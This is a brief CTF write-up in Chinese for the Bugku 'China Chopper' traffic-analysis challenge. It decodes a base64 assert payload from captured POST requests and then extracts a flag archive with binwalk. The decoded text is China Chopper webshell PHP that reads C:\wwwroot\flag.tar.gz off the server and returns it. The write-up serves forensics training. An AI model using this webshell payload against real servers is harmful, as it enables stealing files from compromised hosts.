Bugku 分析 中国菜刀


解压之后得到了一个流量包,只有不到10KB,美滋滋

先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的

随便打开一条pos

是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=)

得到了一串php代码

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\'5.3.0\')
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\'r\');
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\'ERROR:// Can Not Read\');
};
echo("X@Y");
die();

就是说打印一个叫flag(等等flag?)的文件,并在前后打印X@Y

快乐,只要找到flag.tar.gz就好了

最后一条response中就有这个文件

既然是一个文件中包含另一个文件,那就试一试binwalk

提取并解压,即可得到flag

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM